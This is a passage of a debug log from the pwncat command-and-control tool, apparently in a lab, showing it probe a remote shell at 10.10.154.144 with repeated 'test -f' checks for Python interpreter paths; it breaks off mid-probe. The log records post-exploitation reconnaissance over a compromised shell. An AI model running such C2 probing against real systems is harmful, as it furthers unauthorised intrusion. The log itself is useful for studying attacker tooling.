[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.6
2020-06-12 15:46:47,024 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,024 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.6 && echo /usr/local/python3.6/bin/python3.6 || echo;\n'
2020-06-12 15:46:47,025 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,302 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,302 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.7
2020-06-12 15:46:47,302 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,302 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.7 && echo /usr/local/python3.6/bin/python3.7 || echo;\n'
2020-06-12 15:46:47,302 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,328 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,329 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.8
2020-06-12 15:46:47,329 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,329 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.8 && echo /usr/local/python3.6/bin/python3.8 || echo;\n'
2020-06-12 15:46:47,329 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,363 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,364 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python
2020-06-12 15:46:47,364 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,364 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python && echo /usr/local/python3.7/bin/python || echo;\n'
2020-06-12 15:46:47,364 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,429 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,430 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2
2020-06-12 15:46:47,430 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,430 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python2 && echo /usr/local/python3.7/bin/python2 || echo;\n'
2020-06-12 15:46:47,430 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,681 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,681 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2.7
2020-06-12 15:46:47,682 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,682 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python2.7 && echo /usr/local/python3.7/bin/python2.7 || echo;\n'
2020-06-12 15:46:47,682 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,774 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,774 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3
2020-06-12 15:46:47,774 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,774 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3 && echo /usr/local/python3.7/bin/python3 || echo;\n'
2020-06-12 15:46:47,774 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,799 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,799 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.5
2020-06-12 15:46:47,800 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,800 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.5 && echo /usr/local/python3.7/bin/python3.5 || echo;\n'
2020-06-12 15:46:47,800 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,825 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,826 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.6
2020-06-12 15:46:47,826 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,826 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.6 && echo /usr/local/python3.7/bin/python3.6 || echo;\n'
2020-06-12 15:46:47,826 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,853 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,853 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.7
2020-06-12 15:46:47,853 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,853 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.7 && echo /usr/local/python3.7/bin/python3.7 || echo;\n'
2020-06-12 15:46:47,853 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,915 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,915 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.8
2020-06-12 15:46:47,915 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,915 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.8 && echo /usr/local/python3.7/bin/python3.8 || echo;\n'
2020-06-12 15:46:47,915 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,945 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,945 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python
2020-06-12 15:46:47,945 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,945 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python && echo /usr/local/python3.8/bin/python || echo;\n'
2020-06-12 15:46:47,945 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,983 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,983 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2
2020-06-12 15:46:47,983 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:47,984 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python2 && echo /usr/local/python3.8/bin/python2 || echo;\n'
2020-06-12 15:46:47,984 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,012 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,012 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2.7
2020-06-12 15:46:48,012 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,012 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python2.7 && echo /usr/local/python3.8/bin/python2.7 || echo;\n'
2020-06-12 15:46:48,012 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,039 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,040 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3
2020-06-12 15:46:48,040 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,040 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3 && echo /usr/local/python3.8/bin/python3 || echo;\n'
2020-06-12 15:46:48,040 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,234 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,234 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.5
2020-06-12 15:46:48,234 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,234 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.5 && echo /usr/local/python3.8/bin/python3.5 || echo;\n'
2020-06-12 15:46:48,235 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,294 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,294 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.6
2020-06-12 15:46:48,294 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,294 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.6 && echo /usr/local/python3.8/bin/python3.6 || echo;\n'
2020-06-12 15:46:48,294 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,436 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,436 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.7
2020-06-12 15:46:48,436 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,436 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.7 && echo /usr/local/python3.8/bin/python3.7 || echo;\n'
2020-06-12 15:46:48,436 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,466 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,466 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.8
2020-06-12 15:46:48,466 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,466 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.8 && echo /usr/local/python3.8/bin/python3.8 || echo;\n'
2020-06-12 15:46:48,466 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,527 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,527 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python
2020-06-12 15:46:48,527 DEBUG [MainThread] 1803:send(): Trying to send 57 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,527 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python && echo /opt/bin/python || echo;\n'
2020-06-12 15:46:48,527 DEBUG [MainThread] 1826:send(): Sent 57 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,554 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,555 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python2
2020-06-12 15:46:48,555 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,555 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python2 && echo /opt/bin/python2 || echo;\n'
2020-06-12 15:46:48,555 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,583 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,583 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python2.7
2020-06-12 15:46:48,583 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,583 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python2.7 && echo /opt/bin/python2.7 || echo;\n'
2020-06-12 15:46:48,583 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,611 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,611 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3
2020-06-12 15:46:48,611 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,611 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3 && echo /opt/bin/python3 || echo;\n'
2020-06-12 15:46:48,611 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,640 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,640 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.5
2020-06-12 15:46:48,640 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,640 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.5 && echo /opt/bin/python3.5 || echo;\n'
2020-06-12 15:46:48,640 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,666 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,666 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.6
2020-06-12 15:46:48,666 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,666 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.6 && echo /opt/bin/python3.6 || echo;\n'
2020-06-12 15:46:48,666 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,846 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,846 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.7
2020-06-12 15:46:48,846 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,847 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.7 && echo /opt/bin/python3.7 || echo;\n'
2020-06-12 15:46:48,847 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,875 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,875 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.8
2020-06-12 15:46:48,875 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,875 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.8 && echo /opt/bin/python3.8 || echo;\n'
2020-06-12 15:46:48,875 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:48,909 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:48,909 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python
2020-06-12 15:46:48,909 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.154.144:34498
2020-06-12 15:46:48,909 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python && echo /opt/python/bin/python || echo;\n'
2020-06-12 15:46:48,909 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,036 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,036 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python2
2020-06-12 15:46:49,036 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,036 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python2 && echo /opt/python/bin/python2 || echo;\n'
2020-06-12 15:46:49,036 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,062 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,062 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python2.7
2020-06-12 15:46:49,062 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,062 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python2.7 && echo /opt/python/bin/python2.7 || echo;\n'
2020-06-12 15:46:49,063 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,147 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,147 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3
2020-06-12 15:46:49,147 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,147 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3 && echo /opt/python/bin/python3 || echo;\n'
2020-06-12 15:46:49,147 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,172 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,172 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.5
2020-06-12 15:46:49,172 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,172 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.5 && echo /opt/python/bin/python3.5 || echo;\n'
2020-06-12 15:46:49,172 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,197 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,197 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.6
2020-06-12 15:46:49,197 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,197 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.6 && echo /opt/python/bin/python3.6 || echo;\n'
2020-06-12 15:46:49,198 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,223 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,224 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.7
2020-06-12 15:46:49,224 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,224 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.7 && echo /opt/python/bin/python3.7 || echo;\n'
2020-06-12 15:46:49,224 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,249 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,249 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.8
2020-06-12 15:46:49,249 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,249 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.8 && echo /opt/python/bin/python3.8 || echo;\n'
2020-06-12 15:46:49,249 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,280 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,280 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python
2020-06-12 15:46:49,280 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,280 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python && echo /opt/python2/bin/python || echo;\n'
2020-06-12 15:46:49,280 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,521 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,521 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python2
2020-06-12 15:46:49,522 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,522 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python2 && echo /opt/python2/bin/python2 || echo;\n'
2020-06-12 15:46:49,522 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,665 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,665 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python2.7
2020-06-12 15:46:49,666 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,666 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python2.7 && echo /opt/python2/bin/python2.7 || echo;\n'
2020-06-12 15:46:49,666 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,758 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,758 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3
2020-06-12 15:46:49,758 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,758 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3 && echo /opt/python2/bin/python3 || echo;\n'
2020-06-12 15:46:49,758 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,784 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,784 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.5
2020-06-12 15:46:49,784 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,784 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.5 && echo /opt/python2/bin/python3.5 || echo;\n'
2020-06-12 15:46:49,784 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,813 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,813 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.6
2020-06-12 15:46:49,813 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,813 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.6 && echo /opt/python2/bin/python3.6 || echo;\n'
2020-06-12 15:46:49,813 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:49,845 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:49,845 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.7
2020-06-12 15:46:49,845 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:49,845 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.7 && echo /opt/python2/bin/python3.7 || echo;\n'
2020-06-12 15:46:49,846 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,079 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,079 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.8
2020-06-12 15:46:50,079 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,080 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.8 && echo /opt/python2/bin/python3.8 || echo;\n'
2020-06-12 15:46:50,080 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,107 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,108 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python
2020-06-12 15:46:50,108 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,108 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python && echo /opt/python2.7/bin/python || echo;\n'
2020-06-12 15:46:50,109 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:50,138 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:50,138 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2
2020-06-12 15:46:50,138 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.154.144:34498
2020-06-12 15:46:50,138 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python2 && echo /opt/python2.7/bin/python2 || echo;\n'
